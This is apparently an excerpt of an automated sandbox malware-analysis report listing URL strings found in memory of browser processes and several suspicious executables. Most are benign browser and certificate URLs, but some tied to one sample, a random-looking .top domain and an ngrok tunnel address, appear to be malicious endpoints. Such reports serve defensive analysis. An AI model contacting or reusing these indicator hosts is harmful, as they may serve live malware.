Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2929870751.00006DEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2929870751.00006DEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2929870751.00006DEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2929870751.00006DEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/time/1/current
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3219423651.0000024F6FB25000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3333132009.0000024F70551000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013036669.00006DEC00B98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: firefox.exe, 0000001E.00000003.2810071496.0000019DE8777000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2801409202.0000019DE87DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2804011923.0000019DE87DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2806401904.0000019DE81EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2798501613.0000019DE81DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F737F9000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3376180687.0000024F7492B000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3345205080.0000024F70F18000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3370094276.0000024F73DC3000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F737CF000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3367873176.0000024F73A35000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3367873176.0000024F73A44000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3350964569.0000024F70FAD000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3366732850.0000024F7389A000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3377344045.0000024F74A88000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3366732850.0000024F73866000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3366732850.0000024F73863000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3357550442.0000024F711A9000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F7379F000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3372721604.0000024F74423000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3365411007.0000024F737E2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: chrome.exe, 00000022.00000002.3007735332.00006DEC0093C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: file.exe, 00000000.00000002.2157778162.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2157380514.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 0718eb7837.exe, 0000000E.00000003.2719152486.0000000005ECE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2892612430.0000000005E62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3352541260.0000024F7103C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001E.00000003.2786740270.0000019DE583C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787450056.0000019DE5877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2785045981.0000019DE7B00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2786290787.0000019DE581F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2787260190.0000019DE585A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3368256754.0000024F73ADC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.1903881108.000000000081E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659262617.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2658810140.0000000005EE2000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659096491.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2810661969.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2813113663.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3005873380.00006DEC0080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000022.00000002.2931029345.00006DEC00078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000022.00000002.2931029345.00006DEC00078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGetm
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: chrome.exe, 00000022.00000002.2929870751.00006DEC0001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000022.00000002.3012833020.00006DEC00B78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowser
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000022.00000002.3012833020.00006DEC00B78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000022.00000002.2931029345.00006DEC00078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013398134.00006DEC00BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3013398134.00006DEC00BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000022.00000002.2940328921.00006DEC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001F.00000002.2899322458.0000023BA0660000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
